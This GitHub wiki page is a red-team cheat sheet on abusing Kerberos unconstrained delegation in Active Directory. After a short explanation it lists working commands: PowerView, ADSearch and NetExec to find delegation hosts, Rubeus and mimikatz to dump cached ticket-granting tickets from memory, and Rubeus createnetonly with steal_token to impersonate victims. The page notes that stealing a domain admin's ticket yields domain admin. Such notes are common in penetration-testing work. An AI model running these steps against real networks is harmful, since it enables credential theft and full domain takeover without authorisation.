Unconstrained delegation - CraigDonkin/Infrastructure GitHub Wiki

Trust this computer for delegation to any service (Kerberos only)

  • Delegation allows a user or computer to impersonate another account, so they can access resources.
  • You can restrict what services the user or computer can impersonate. This is constrained delegation. If you don't use this option then it is unconstrained delegation.
  • If a user authenticates to a computer that has unconstrained delegation activated, the authenticated user's TGT is saved to the computers memory. When the computer tries to access something on behlaf of that user, the users TGT is used to request a TGS.
    • For example, a user authenticates to IIS which authenticates on behalf of them to a database server.
  • From a red team perspective, if you compromise a machine with unconstrained delegation, you can extract TGTs from the memory and then impersonate the victims against services.
    • If the victim is domain admin then you have domain admin.

Enumerate computers permitted for unconstrained delegation

PowerView

Get-NetComputer -Unconstrained

ADSearch

ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

NetExec

nxc ldap <ip> -u <username> -p <password> --trusted-for-delegation

Enumerate cached TGT

  • Run Rubeus triage and look for the krbtgt service in the output.
  • Note the LUID
Rubeus triage
  • Or use Rubeus monitor which will periodically extract TGTs.
  • Monitor time is in seconds. You can use /runfor:<seconds> to set a period.
  • If trying to target a specific user then use /targetuser:<user> 
Rubeus monitor /interval:<interval> /nowrap
Rubeus monitor /interval:<interval> /targetuser:<user>

Force authentication

  • Use a coercion method to force authentication from a target to the host that supports unconstrained delegation.
  • If capturing a machine account TGT you would need to use S4U2SELF

Extract TGT

  • Use Rubeus with the LUID
Rubeus.exe dump /luid:<luid> /nowrap
  • Use Rubeus with monitor
Rubeus monitor /interval:<interval> /nowrap
Rubeus monitor /interval:<interval> /targetuser:<user>
  • Use mimikatz
mimikatz !sekurlsa::tickets /export

Leverage the TGT

  • Use Rubeus to leverage the TGT
Rubeus.exe createnetonly /program:<program such as cmd.exe> /domain:<domain> /username:<user to impersonate> /password:<any fake password> /ticket:<TGT>
  • Then impersonate the process
steal_token <PID>
⚠️ **GitHub.com Fallback** ⚠️